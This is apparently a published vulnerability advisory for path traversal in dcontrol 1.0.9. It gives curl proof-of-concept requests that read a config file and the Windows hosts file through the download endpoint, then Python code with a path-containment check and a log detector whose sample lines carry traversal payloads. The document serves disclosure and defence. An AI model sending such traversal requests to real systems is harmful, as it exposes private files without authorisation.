Description
dcontrol version 1.0.9 suffers from an unauthenticated local file inclusion vulnerability via a path traversal...
Basic Information
ID
PACKETSTORM:219189
Published
Apr 20, 2026 at 00:00
# Exploit Title: dcontrol v1.0.9 - Unauthenticated Local File Inclusion (LFI)
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dcontrol
# Software Link: https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
# Version: 1.0.9
# Tested on: Windows 10, Windows 11
# Description:
dcontrol is vulnerable to Local File Inclusion (LFI) via path traversal in
the /control-api/file/download endpoint. An unauthenticated attacker can read
arbitrary files from the target system by supplying directory traversal
sequences (../) in the 'name' parameter.
# Proof of Concept:
1. Read the application configuration file:
curl "http://TARGET_IP:666/control-api/file/download?name=../config.yml"
name: "远程控制"
port: 666
open: false
volume: true
dir: files
apps:
  - name: 微信
    path: E:\Program Files (x86)\Tencent\WeChat\WeChat.exe
  - name: 网易云
    path: E:\Program Files (x86)\NetEase\CloudMusic\cloudmusic.exe
2. Read Windows hosts file:
curl "http://TARGET_IP:666/control-api/file/download?name=../../../../../../Windows/System32/drivers/etc/hosts"
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
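The root cause described above is a download handler that joins a user-supplied 'name' onto its files directory without checking that the result still lies inside that directory. The following Python is an added example written for this advisory; it is not dcontrol's code (the project's real handler, file layout and log format are not shown on the page). It demonstrates the containment check a download endpoint needs (percent-decoding and separator folding before a lexical normalisation, then a prefix test against the base directory) and a small detector that applies the same check to access-log lines. BASE_DIR, the log line format and all function names are assumptions.

```python
import posixpath
from urllib.parse import urlparse, parse_qs, unquote

# Assumed download directory (the advisory's config shows "dir: files";
# the real on-disk location is not on the page).
BASE_DIR = "/srv/dcontrol/files"
DOWNLOAD_PATH = "/control-api/file/download"


def normalize_name(name: str) -> str:
    """Canonicalise a user-supplied file name before the containment check.

    Percent-decoding runs twice so double-encoded sequences (%252e%252e%252f)
    collapse to the same form as a literal '../', and backslashes are folded
    to '/' because Windows path APIs accept either separator.
    """
    decoded = unquote(unquote(name))
    return decoded.replace("\\", "/")


def resolve_download_path(base_dir: str, name: str) -> str:
    """Return the path under base_dir that 'name' denotes, or raise ValueError.

    The check is lexical: join, normalise away '.' and '..' components, then
    require the result to sit strictly below base_dir.  Absolute paths and
    drive-letter prefixes are rejected instead of being silently re-rooted.
    """
    cleaned = normalize_name(name)
    if cleaned.startswith("/") or (len(cleaned) > 1 and cleaned[1] == ":"):
        raise ValueError(f"absolute path rejected: {name!r}")
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, cleaned))
    if not candidate.startswith(base + "/"):
        raise ValueError(f"path escapes download directory: {name!r}")
    return candidate


def is_safe_name(name: str) -> bool:
    """True if 'name' would be served from inside BASE_DIR, False otherwise."""
    try:
        resolve_download_path(BASE_DIR, name)
        return True
    except ValueError:
        return False


def flag_traversal_requests(log_lines):
    """Return (line_number, decoded_name) for download requests whose 'name'
    parameter fails the containment check.

    The line format is a constructed combined-log style ('"GET /path HTTP/1.1"'
    inside double quotes); adjust the split for a real server's log.
    """
    findings = []
    for lineno, line in enumerate(log_lines, start=1):
        try:
            request = line.split('"')[1]
            _method, target, _proto = request.split(" ", 2)
        except (IndexError, ValueError):
            continue  # not a request line we understand
        parsed = urlparse(target)
        if parsed.path != DOWNLOAD_PATH:
            continue
        for name in parse_qs(parsed.query).get("name", []):
            if not is_safe_name(name):
                findings.append((lineno, normalize_name(name)))
    return findings


# Constructed sample log: one legitimate download, two traversal attempts
# (one plain, one percent-encoded) and one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Apr/2026:10:00:01 +0000] "GET /control-api/file/download?name=report.txt HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Apr/2026:10:00:07 +0000] "GET /control-api/file/download?name=../config.yml HTTP/1.1" 200 231',
    '10.0.0.9 - - [18/Apr/2026:10:00:09 +0000] "GET /control-api/file/download?name=..%2F..%2F..%2FWindows%2FSystem32%2Fdrivers%2Fetc%2Fhosts HTTP/1.1" 200 824',
    '10.0.0.9 - - [18/Apr/2026:10:00:11 +0000] "GET /control-api/status HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for lineno, name in flag_traversal_requests(SAMPLE_LOG):
        print(f"line {lineno}: traversal in name parameter -> {name}")
```

Rejecting rather than sanitising is deliberate: stripping '../' sequences can be bypassed by forms such as '....//' that become '../' after one strip pass, whereas a normalise-then-check test either places the final path under the base directory or refuses the request. In the detector, a 200 status on a flagged line is the stronger signal, since it means the file was actually served.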